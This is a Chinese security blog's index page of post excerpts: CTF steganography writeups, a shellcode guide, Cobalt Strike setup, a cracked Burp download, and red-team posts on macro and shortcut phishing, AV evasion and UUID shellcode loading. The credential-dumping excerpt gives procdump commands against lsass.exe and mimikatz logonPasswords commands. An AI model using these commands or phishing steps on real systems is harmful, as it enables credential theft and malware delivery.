TypechoJoeTheme

Harvey

统计
登录
用户名
密码
/
注册
用户名
邮箱
2021-02-28

CTF-图片隐写的那些工具

CTF-图片隐写的那些工具
前言懒狗今天决定整理一下图片隐写上的一些工具1.F5-steganography一款F5隐写工具(kali)(PS:需要密码)kali安装命令(也可直接下载):git clone https://github.com/matthewgao/F5-steganography加密:java Embed 原图.jpg 生成图.jpg -e 隐藏的文件.txt -p '密码'解密:java Extract 生成图.jpg -p '密码'[line]举个栗子吧~[/line]2.steghideSteghide是一种隐写程序,能够隐藏各种图像和音频文件中的数据。颜色方面的样本频率不会更改,因此使嵌入抗一阶统计检验。Windows下官网下载地址:http://steghide.sourceforge.net/download.php加密:steghide embed -cf .\原图.jpg -ef 隐藏的文件.txt 然后还要输入密码,确认密码解密:steghide extract -p '密码' -sf .\生成图.jpg 输入 y 确认[line]举个栗子吧~[/line]Linux-...
Harvey
2021-02-28

CTF,Mine,笔记

8 阅读
0 评论
2021年02月28日
8 阅读
0 评论
2021-02-24

shellcode编写指南

shellcode编写指南
1.前言linux的shellcode就不用说了,直接通过一个int 0x80系统调用,指定想调用的函数的系统调用号(syscall),传入调用函数的参数,即可,懂的都懂。在windows中,没有像int 0x80系统调用功能来找相应的函数,但是也有syscall这样的系统调用,过AV奇效,这里主要介绍的是如何手动去通过GetProcAddress去查找某个函数的地址,然后进行调用,这里需要一丢丢c基础和汇编基础。2.原理在windows中,我们需要如下步骤去找到相应的函数,进行调用:1)找到PEB表,获取Kernel32.dll base地址2)通过kernel32.dll PE文件格式找到导出表的地址3)通过导出表定位GetProcAddress的RVA4)通过GetProcAddress函数找到LoadLibraryA函数地址5)通过这GetProcAddress和LoadLibraryA两个函数来加载dll文件和查找函数以供使用先了解几个基本概念,api函数,动态链接库文件。2.1 kernel32.dll定义:kernel32.dll是windows中非常重要的32位动...
Harvey
2021-02-24

Gamma实验室

23 阅读
0 评论
2021年02月24日
23 阅读
0 评论
2021-02-21

2021SXCCTF

2021SXCCTF
签到http://106.55.249.213:5002/祝各位大佬,大大佬,新春快乐!2021 更加牛13!!!flag在短片中:flag{Happy_New_Year_2021}MiscFlag不在这Flag真的不在这,你要相信我,知道吗!打开显示Flag不在这!于是放入010发现是个压缩包,打开发现flag.txt:flag{It's_real_easy!D0_Y0u_Like_it?}牛年大吉要相信自己,他就是flag!查看属性发现flag:flag{这个就是哦!}网络深处网络深处! 千万不要一个人大晚上做哦!!!原题就不写了.滑稽.jpghttps://blog.harvey.plus/index.php/Writeup/2020UNCTF-%E5%85%AC%E5%BC%80%E8%B5%9B.html#%E7%BD%91%E7%BB%9C%E6%B7%B1%E5%A4%841拼图你也喜欢鬼刀吗?montage合成 + gaps对大图遗传算法解拼图①.montage(Windows)(PS:将其改为1200X1200)montage "D:\Harvey\赛...
Harvey
2021-02-21

Writeup

39 阅读
0 评论
2021年02月21日
39 阅读
0 评论
2021-02-20

红队技巧-网络钓鱼

红队技巧-网络钓鱼
前言涵盖了现在大多数红队钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜!1. excel宏执行任意命令新建一个exel表,然后打开,对准这个右键点击插入宏。然后在第一切换到宏,复制粘贴如下语句:=EXEC("notepad") =HALT()必须带=HALT(),不然虽然命令执行了,但会报错,容易露馅!然后测试一下,选中语句,右键,点击执行:就会弹出notepad:通过msf生成msi文件,python开启http服务,然后替换命令为攻击载荷,右键隐藏宏,并把文件执行方式改为Auto_open,直接复制粘贴,按一下enter就行了然后另存,2016版本记得点击否,然后得选择一个启用宏的文件,远方服务器监听:就欧克了,当然这里肯定不止这个msi文件,都能执行命令了,该怎么利用,你懂的!2 Link钓鱼:随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性:我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。修改:C:\Windows\System32\cmd.exe /c powershell -nop...
Harvey
2021-02-20

红队手册,Gamma实验室

31 阅读
0 评论
2021年02月20日
31 阅读
0 评论
2021-02-18

2021NEWSCTF

2021NEWSCTF
0X1 Miscmisc签到处binwalk得到了个flag.txt,base64得到flag:flag{Welc0me_t0_newsctf!!!}伪装者https://wws.lanzous.com/ihGAlldzfmb flag格式:flag{}Hint:steghide修改rar头文件得到以下信息①.背景.txt小林 正在追一部剧,但是他忘了剧名中一位角色的名字,于是他截了个图(好看的剧.png),开始了询问环节. -----你能帮小林认出这是谁嘛 注:角色名字(中文拼音)是压缩包的密码②.好看的剧.png③.通过以上信息可以得知压缩包密码: wangtianfeng ;得到niu.jpg④.key.wav(steghide隐写需要用到的密码)(PS:和GKCTF中Harley Quinn的考点一样)最后一小段可以听到拨号声,将其提取出来(因为后面提及的工具只能分析几十秒内的音频QAQ),DTMF,利用 工具(提取码:oy3x) 得到如下信息手机键盘密码解出key = ctfisfun最后得到flag(bushi划到最底下可以看到以下信息:熊曰:呋食很誒咯...
Harvey
2021-02-18

Writeup

42 阅读
0 评论
2021年02月18日
42 阅读
0 评论
2021-02-17

红队技巧-导出凭据和密码

红队技巧-导出凭据和密码
前言红队中各种抓取密码凭据的方法,文末彩蛋,内附工具链接,以及我制作的过360的minikatz的版本,各位请享用,最近筹备重新开blog,记录学习计划,不然知识我学完立马就忘了,与大家一起学习!1.Procdump转储Lsass.exe的内存前提:需要管理员及以上权限常用命令:procdump -accepteula -ma lsass.exe lsass_dump导出的.dmp文件本地配合minikatz 取出密码sekurlsa::Minidump lsassdump.dmp sekurlsa::logonPasswords如果对lsass.exe敏感的话,那么还可以配合lsass.exe的pid来使用更香:procdump -accepteula -ma pid lsass.dmp2.wce导出hash前提:需要管理员及以上权限,版本限制(仅支持Windows XP,2003,Vista,7、2008和Windows 8)命令:wce.exe -o file.txt wec.exe3.comsvcs.dll转储LSASS.exe内存前提:在powershell中运行,管...
Harvey
2021-02-17

红队手册,Gamma实验室

33 阅读
0 评论
2021年02月17日
33 阅读
0 评论
2021-02-15

Powerview脚本和Windowsdefender的恩恩怨怨

Powerview脚本和Windowsdefender的恩恩怨怨
前言起因,是我想测试一下,powersploit的免杀效果,然后就去github下载了powersploit的脚本集合包,powerview脚本也给集合进去了,然后就引发了一些列感到令人疑惑的事。过程当我导入recon信息收集模块的时候,windows defender 报毒了,给我阻止了按照以往的查找特征码手法,是挨个文件试,结果被我发现是powerview.ps1这个脚本被windows defender报毒,范围进一步缩小。然后就开始免杀windows defender的尝试,我开始把一些脚本里的特征字符,多余的字符,比如什么介绍,注释什么的都删掉,删掉了一部分再次尝试导入:依然失败,我把windows defender 来直接扫描文件,没有报毒,说明静态过了的,那肯定是动态行为没过。powershell 脚本过amsi挺多方法的,比如字符拼接,编码,变量替换等等,但是powerview很长一段的代码,我得逐行去试,去找特征字符串,那真的难受死了。因为我本人也不是很懂powershell,所以没去尝试,然后想到一个过windows defender的办法,感觉挺简单的那就是...
Harvey
2021-02-15

Gamma实验室

34 阅读
0 评论
2021年02月15日
34 阅读
0 评论
2021-02-14

HGAME 2021 WEEK2

HGAME 2021 WEEK2
0X1Misc1.Tools工欲善其事,必先利其器。附件(提取码:glal)很明显看附件名就知道是F5隐写首先我们查看属性得知其密码:!LyJJ9bi&M7E72*JyD,进而得到压缩包密码: e@317S*p1A4bIYIs1M又是一层加密...同样的处理方法,就是这次是steghide隐写,得到压缩包密码:u0!FO4JUhl5!L55%$&好家伙!经典老套娃了这回是Outguess隐写,同样的手法得到压缩包密码:@UjXL93044V5zl2ZKI终于到最后一层加密了,JPHS隐写得到压缩包密码:xSRejK1^Z1Cp9M!z@H最终将四块拼接起来组成一个完整的二维码,扫码得到flag:hgame{Taowa_is_N0T_g00d_but_T001s_is_Useful}2.Telegraph:1601 6639 3459 3134 0892他曾经最喜欢的曲师写的曲子,让人犹如漫步在星空之下,可如今他听见只觉得反胃。由于文件名过长,单独给出附件的md5: E5C3EE3F441B860B07A3ADCD98BFFC00请将flag以hgame{your_...
Harvey
2021-02-14

Writeup

40 阅读
0 评论
2021年02月14日
40 阅读
0 评论
2021-02-12

再见2020,你好2021!

再见2020,你好2021!
前言:原本身为懒狗的我是不准备写这年度总结滴QAQbut 跨年夜外面就和打战一样一炮接一炮(吵死个人),最终爬起来简单写一下总结20202020年初由于疫情不用去学校使得我有大把时间浪,老赛棍的我参加了许多场比赛(签到选手~)也正是因此认识许多志群道和的师傅们,期间泻药0kami邀请加入了N1ce一起打比赛,感谢各位陪伴我一起走过了那段可能让我很无聊的时光!接着就到了一年两度的期末考了,感谢线上考试让我轻松及格以及电路分析补考顺利过关~nice!对了,考前参加的DozerCTF还拿了个优(安)秀(慰)奖接着就是一波安逸的暑假还有好多就不一一列出了~很快就通知开学了,得去学校了(有一说一我是真不想去学校QAQ)好日子就这样没了一到学校就各种奇奇怪怪的规矩(突然想阴阳怪气~不过渣渣二本也就这样了,认命吧大过年的还是整喜庆点⑧√开学后我就大二啦,喜提学长称号由于我们学校断层了,开学后我接手了网络安全协会的会长一职(本人其实并不是很想当接着就是一年一度的网络安全宣传周,各地省赛接踵而至,我们大福建当然也不列外,不过由于疫情,百越杯被冲掉,黑盾杯变成线上赛,不过工控进入决赛使得我有幸去了人...
Harvey
2021-02-12

Mine,笔记

46 阅读
0 评论
2021年02月12日
46 阅读
0 评论
2021-02-10

burp-2021-2破解版下载

burp-2021-2破解版下载
前言此次版本更新如下内容(此版本改进了消息检查器、非打印字符显示、平台身份验证控件和嵌入式浏览器)详情如下1.提供了一个新的漏洞定义和几个bug修正新的漏洞定义:当目标应用程序导入具有已知漏洞的JavaScript依赖项时,易受攻击的JavaScript依赖项ciesburp Scanner现在将检测到,例如,当一个图书馆已经过时或有其他危险时问题。非-打印字符改进在文本编辑器中查看非打印字符时,十六进制代码点低于20的字符将显示为带有十六进制代码的“菱形”。现在,代码点从7F到FF的字符也会显示在同一行中路。每-平台身份验证的主机控件现在可以在每个主机上打开或关闭平台身份验证(在“用户选项”和“连接”选项卡下)基本信息检查器改进消息中的性能有了显著的改进检查员。此外,用户现在可以水平调整消息检查器的大小,并同时选择多个条目一次,嵌入浏览器改进不再发送由嵌入式Chromium浏览器本身而不是用户发起的HTTP请求。2.Burp的嵌入式浏览器已升级到Chromium 88.0.4324.150。3.错误修复和小改进此版本还提供以下错误修复和小改进:当在macOS上处于全屏模式时,H...
Harvey
2021-02-10

工具推送,Gamma实验室

38 阅读
0 评论
2021年02月10日
38 阅读
0 评论
2021-02-07

HGAME 2021 WEEK1

HGAME 2021 WEEK1
0X1Misc1.Base全家福新年即将来临之际,Base家族也团聚了,他们用他们特有的打招呼方式向你问了个好,你知道他们在说什么吗? R1k0RE1OWldHRTNFSU5SVkc1QkRLTlpXR1VaVENOUlRHTVlETVJCV0dVMlVNTlpVR01ZREtSUlVIQTJET01aVUdSQ0RHTVpWSVlaVEVNWlFHTVpER01KWElRPT09PT09base64->base32->base162.不起眼压缩包的养成的方法0x4qE给了张图给我,说这图暗藏玄机,你能帮我找出来吗?很明显是个压缩包,打开发现加密了~提示如下锘縋assword is picture ID (Up to 8 digits)猜测密码为其P站ID,识图得到其ID:70415155,成功解压https://graph.baidu.com/s?sign=12672a6df695e369823b901612610051&f=all&tn=pc&tn=pc&srcp=&idctag=gz&sids=10006_1080...
Harvey
2021-02-07

Writeup

37 阅读
0 评论
2021年02月07日
37 阅读
0 评论
2021-02-03

记一次CS的搭建过程

记一次CS的搭建过程
前言:为提升实战技术并积累实战经验,于是我在vultr服务器上第一次搭建了CS环境:Debian10Cobalt Strike 4.1首先,我们先要准备一台Debian10的服务器(其他也可)接着我们ssh连上服务器ssh root@IP 登录(回车yes输入密码 apt update 打开sftp将cs上传(put上传文件 get下载文件)sftp root@IP 进入ftp(回车输入密码 ls put C:\Users\xxx\cs4.1.zip 上传cs返回ssh解压cs(Ubuntu默认是没有安装unzip)apt install unzip 安装unzip unzip cs4.1.zip 解压cs安装javaapt install default-jdk启动cscd cs4.1 进入cs文件 sudo ./teamserver IP 密码 启动cs并设置密码 如果报错出现无此命令,使用“chmod 777 teamserver”授予权限即可。结束Ctrl c由...
Harvey
2021-02-03

Mine,笔记

33 阅读
0 评论
2021年02月03日
33 阅读
0 评论
2021-02-01

CyberSecurityRSS

CyberSecurityRSS
前言作者:zer0yugithub开源地址:https://github.com/zer0yu/CyberSecurityRSSCyberSecurityRSS简介: 网络安全相关的RSS订阅,帮助建立个人情报来源和日常知识库更新 更新频率: 每2个月一次文件说明: 1.附录加一些可能没有rss的站点,但是是本人日常浏览的不错站点,重点写出来了。 2.tiny.opml是个人速览使用的一个精简版本。 3.CyberSecurityRSS.xml是集合了泉哥和rr的一个十分丰富的版本,也分好了类别。PS: 如果遇到导入文件格式问题的可以将xml后缀修改为opml后缀,反之也可。使用方法1 - Reeder3/Reeder4 (macOS, IOS的首选)使用方法2 - yarr (macOS, Windows, Linux)使用方法3 - Leaf直接导入提供的文件即可使用方法4 - Feedly这种是网页的形式(当然也有APP),feedly的免费版本,tiny.opml可以直接导入并够用,但是CyberSecurityRSS.xml版本会超过免费的订阅限制。使用方法5 -...
Harvey
2021-02-01

工具推送,Gamma实验室

28 阅读
0 评论
2021年02月01日
28 阅读
0 评论
2021-01-30

红队技巧-利用uuid加载shellcode

红队技巧-利用uuid加载shellcode
前言近期国外的Tweet上面的Check Point Research发布了一篇有趣的推文:这篇推文大概讲的是通过分析了一个恶意样本,找到一种非常有趣的向内存写入shellcode方式。这里就不细究钓鱼文档利用宏加载shellcode的细节了,感兴趣的可以去看这篇文章:https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/值得注意的是:在自定义代码中,攻击者使用了windows api 遍历了大量硬编码 UUID 值列表,并且每次都提供指向分配内存(堆)的指针,深入分析后,发现了一种将数据写入堆的方法。这种技术早在2017年就有国外大佬提出,但是最近才抓到恶意样本,爆出来!!uuid是什么?通用唯一识别码(Universally Unique Identifier,缩写:UUID),是用于计算机体系中以识别信息数目的一个128位标识符,根据标准方法生成,不依赖中央机构的注册和分配,UUID具有唯一性。当然还有一种GUID(全局唯一标识符(英语:Glo...
Harvey
2021-01-30

红队手册,Gamma实验室

38 阅读
0 评论
2021年01月30日
38 阅读
0 评论
Harvey
最怕碌碌无为还叹平凡可贵
98 文章数
9 评论量

人生倒计时

今日已经过去小时
这周已经过去
本月已经过去
今年已经过去个月

标签云

微博热搜榜

  • 获取失败!

今日天气